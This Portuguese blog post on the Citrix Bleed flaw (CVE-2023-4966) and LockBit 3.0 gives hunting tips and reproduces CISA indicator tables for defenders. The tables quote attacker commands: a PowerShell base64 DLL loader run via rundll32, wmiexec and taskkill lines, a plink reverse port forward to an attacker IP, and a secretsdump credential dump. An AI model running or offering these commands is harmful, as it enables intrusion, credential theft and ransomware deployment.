O CVE-2023-4966, conhecido como “Citrix Bleed“, é uma vulnerabilidade crítica de divulgação de informações no Citrix NetScaler Application Delivery Controller (ADC) e no NetScaler Gateway.
Citrix Bleed e LockBit 3.0
O Citrix Bleed é conhecido por ser explorado pelas afiliadas do LockBit 3.0, historicamente, as afiliadas do LockBit 3.0 conduziram ataques contra organizações de tamanhos variados em vários setores de infraestrutura crítica, incluindo educação, energia, serviços financeiros, alimentos e agricultura, serviços governamentais e de emergência, saúde, manufatura e transporte.
Hunting
Priorizar a observação dos usuários em sessão ao procurar anomalias na rede. Isso ajuda na busca por atividades suspeitas, como instalação de ferramentas no sistema (por exemplo, putty, rClone), criação de novas contas, logs de falha ou execução de comandos como hostname, quser, whoami, net e taskkill.
Para endereços IP:
- Identifique se o NetScaler registra a alteração no IP.
- Identifique se os usuários estão fazendo login em locais geográficos incomuns para a base de usuários da sua organização.
- Ao registrar a autenticação VPN, identifique se os usuários estão associados a dois ou mais endereços IP públicos enquanto estão em uma sub-rede diferente ou geograficamente dispersos.
Nota: A MFA para NetScaler não funcionará conforme planejado porque o invasor ignora a autenticação fornecendo um token/sessão para um usuário já autenticado.
Os procedimentos a seguir podem ajudar a identificar a exploração potencial da atividade CVE-2023-4966 e LockBit 3.0:
- Pesquise nomes de arquivos que contenham
tf0gYx2YI
para identificar arquivos criptografados LockBit. - Atores do LockBit 3.0 geralmente usam
C:\Temp
para download, e execução de arquivos. - Investigue solicitações para o endpoint HTTP/S do WAF.
- Procure padrões de login suspeitos nos logs do NetScaler
- Procure chaves de registro do Windows suspeitas do agente de desktop virtual
- Analise arquivos de dump principal de memória.
Indicadores de Comprometimento (IOCs)
O site oficial da Cybersecurity and Infrastructure Security Agency (CISA), uma agência federal dos Estados Unidos publicou um relatório completo sobre o tema e deixou disponibilizado os IOCs normalmente explorados pelos afiliados.
- Baixe a versão em PDF deste relatório:
- Download da lista de IOCs
Regras YARA
Neste repositório, você encontrará 4 regras YARA distintas, cada uma projetada para identificar diferentes aspectos e variantes do ransomware Lockbit descrita no documentos oficial do CISA.
- LockBit3.CVE2023-4966_BAT.YARA
- LockBit3.CVE2023-4966_DLL.YARA
- LockBit3.CVE2023-4966_EXE.YARA
- LockBit3.CVE2023-4966_PY.YARA
https://github.com/danieldonda/YARA_RULES/tree/main
LOLBINS
O malware identificado nesta campanha é gerado começando com a execução de um script PowerShell (123.ps1) que concatena duas strings base64, converte-as em bytes e grava-as no caminho de arquivo designado.
$y = “TVqQAAMA…<string longa base64>”
$x = “RyEHABFQ…<string longa base64>”
$filePath = “C:\Usuários\Público\adobelib.dll” $fileBytes = [System.Convert]::FromBase64String($y + $x)
[System.IO.File]::WriteAllBytes($filePath, $fileBytes)
O arquivo resultante (adobelib.dll) é então executado pelo script do PowerShell usando rundll32. rundll32 C:\Users\Public\adobelib.dll,main <chave hexadecimal 104>
IOCs
Indicator | Type | Fidelity | Description |
---|---|---|---|
192.229.221[.]95 | IP | Low | Mag.dll calls out to this IP address. Ties back to dns0.org . Should run this DLL in a sandbox, when possible, to confirm C2. IP is shared hosting. |
123.ps1 | PowerShell script | High | Creates and executes payload via script. |
193.201.9[.]224 | IP | High | FTP to Russian geolocated IP from compromised system. |
62.233.50[.]25 | IP | High | Russian geolocated IP from compromised system. Hxxp://62.233.50[.]25/en-us/docs.html Hxxp://62.233.50[.]25/en-us/test.html |
51.91.79[.].17 | IP | Med | Temp.sh IP. |
Teamviewer | Tool (Remote Admin) | Low | |
70.37.82[.]20 | IP | Low | IP was seen from a known compromised account reaching out to an Altera IP address. LockBit is known to leverage Altera, a remote admin tool, such as Anydesk, team viewer, etc. |
185.17.40[.]178 | IP | Low | Teamviewer C2, ties back to a polish service provider, Artnet Sp. Zo.o. Polish IP address. |
Indicator | Type | Fidelity | Description |
---|---|---|---|
185.229.191.41 | Anydesk Usage | High | Anydesk C2. |
81.19.135[.]219 | IP | High | Russian geolocated IP hxxp://81.19.135[.]219/F8PtZ87fE8dJWqe.hta Hxxp://81.19.135[.]219:443/q0X5wzEh6P7.hta |
45.129.137[.]233 | IP | Medium | Callouts from known compromised device beginning during the compromised window. |
185.229.191[.]41 | Anydesk Usage | High | Anydesk C2. |
Plink.exe | Command interpreter | High | Plink (PuTTY Link) is a command-line connection tool, similar to UNIX SSH. It is mostly used for automated operations, such as making CVS access a repository on a remote server. Plink can be used to automate SSH actions and for remote SSH tunneling on Windows. |
AnyDeskMSI.exe | Remote admin tool | High | We do see that AnyDeskMSI.exe was installed as a service with “auto start” abilities for persistence. Config file from the image could be leveraged to find the ID and Connection IP, but we do not have that currently. |
SRUtility.exe | Splashtop utility | 9b6b722ba4a691a2fe21747cd5b8a2d18811a173413d4934949047e04e40b30a | |
Netscan exe | Network scanning software | High | 498ba0afa5d3b390f852af66bd6e763945bf9b6bff2087015ed8612a18372155 |
Indicator | Type | Fidelity | Description |
---|---|---|---|
Scheduled task: \MEGA\MEGAcmd | Persistence | High | |
Scheduled task: UpdateAdobeTask | Persistence | High | |
Mag.dll | Persistence | High | Identified as running within UpdateAdobeTask cc21c77e1ee7e916c9c48194fad083b2d4b2023df703e544ffb2d6a0bfc90a63 . |
123.ps1 | Script | High | Creates rundll32 C:\Users\Public\adobelib.dll,main ed5d694d561c97b4d70efe934936286fe562addf7d6836f795b336d9791a5c44 . |
Adobelib.dll | Persistence | Low | C2 from adobelib.dll . |
Adobe-us-updatefiles[.]digital | Tool Download | High | Used to download obfuscated toolsets. |
172.67.129[.]176 | Tool Download | High | IP of adobe-us-updatefiles[.]digital. |
104.21.1[.]180 | Tool Download | High | Adobe-us-updatefiles[.]digital. |
cmd.exe /q /c cd 1> \\127.0.0.1\admin$\__1698617793[.]44 2>&1 | Command | High | wmiexec.exe usage |
cmd.exe /q /c cd \ 1> \\127.0.0.1\admin$\__1698617793[.]44 2>&1 | Command | High | wmiexec.exe usage |
cmd.exe /q /c query user 1> \\127.0.0.1\admin$\__1698617793[.]44 2>&1 | Command | High | wmiexec.exe usage |
cmd.exe /q /c taskkill /f /im sqlwriter.exe /im winmysqladmin.exe /im w3sqlmgr.exe /im sqlwb.exe /im sqltob.exe /im sqlservr.exe /im sqlserver.exe /im sqlscan.exe /im sqlbrowser.exe /im sqlrep.exe /im sqlmangr.exe /im sqlexp3.exe /im sqlexp2.exe /im sqlex | Command | High | wmiexec.exe usage |
cmd.exe /q /c cd \ 1> \\127.0.0.1\admin$\__1698618133[.]54 2>&1 | Command | High | wmiexec.exe usage |
Indicator | Type | Fidelity | Description | Notes |
---|---|---|---|---|
81.19.135[.]219 | IP | High | Russian geolocated IP used by user to request mshta with http arguments to download random named HTA file named q0X5wzzEh6P7.hta | |
81.19.135[.]220 | IP | High | Russian geolocated IP, seen outbound in logs | IP registered to a South African Company |
81.19.135[.]226 | IP | High | Russian geolocated IP, seen outbound in logs | IP registered to a South African Company |
Type | Indicator | Description |
---|---|---|
Filename | c:\users\<username>\downloads\process hacker 2\peview.exe | Process hacker |
Filename | c:\users\<username>\music\process hacker 2\processhacker.exe | Process hacker |
Filename | psexesvc.exe | Psexec service excutable |
Filename | c:\perflogs\processhacker.exe | Process hacker |
Filename | c:\windows\temp\screenconnect\23.8.5.8707\files\processhacker.exe | Process hacker transferred via screenconnect |
Filename | c:\perflogs\lsass.dmp | Lsass dump |
Filename | c:\users\<username>\downloads\mimikatz.exe | Mimikatz |
Filename | c:\users\<username>\desktop\proc64\proc.exe | Procdump |
Filename | c:\users\<username>\documents\veeam-get-creds.ps1 | Decrypt veeam creds |
Filename | secretsdump.py | Impacket installed on azure vm |
Cmdline | secretsdump.py <domain>/<username>@<ip> -outputfile 1 | Impacket installed on azure vm |
Filename | ad.ps1 | Adrecon found in powershell transcripts |
Filename | c:\perflogs\64-bit\netscan.exe | Softperfect netscan |
Filename | tniwinagent.exe | Total network inventory agent |
Filename | psexec.exe | Psexec used to deploy screenconnect |
Filename | 7z.exe | Used to compress files |
Tool | Action1 | RMM |
Tool | Atera | RMM |
tool | anydesk | rmm |
tool | fixme it | rmm |
tool | screenconnect | rmm |
tool | splashtop | rmm |
tool | zoho assist | rmm |
ipv4 | 101.97.36[.]61 | zoho assist |
ipv4 | 168.100.9[.]137 | ssh portforwarding infra |
ipv4 | 185.20.209[.]127 | zoho assist |
ipv4 | 185.230.212[.]83 | zoho assist |
ipv4 | 206.188.197[.]22 | powershell reverse shell seen in powershell logging |
ipv4 | 54.84.248[.]205 | fixme ip |
Ipv4 | 141.98.9[.]137 | Remote IP for CitrixBleed |
domain | assist.zoho.eu | zoho assist |
filename | c:\perflogs\1.exe | connectwise renamed |
filename | c:\perflogs\run.exe | screenconnect pushed by psexec |
filename | c:\perflogs\64-bit\m.exe | connectwise renamed |
filename | c:\perflogs\64-bit\m0.exe | connectwise renamed |
filename | c:\perflogs\za_access_my_department.exe | zoho remote assist |
filename | c:\users\<username>\music\za_access_my_department.exe | zoho remote assist |
filename | c:\windows\servicehost.exe | plink renamed |
filename | c:\windows\sysconf.bat | runs servicehost.exe (plink) command |
filename | c:\windows\temp\screenconnect\23.8.5.8707\files\azure.msi | zoho remote assist used to transfer data via screenconnect |
cmdline | echo enter | c:\windows\servicehost.exe -ssh -r 8085:127.0.0.1:8085 <username>@168.100.9[.]137 -pw <password> | plink port forwarding |
domain | eu1-dms.zoho[.]eu | zoho assist |
domain | fixme[.]it | fixme it |
domain | unattended.techinline[.]net | fixme it |
Seja o primeiro a comentar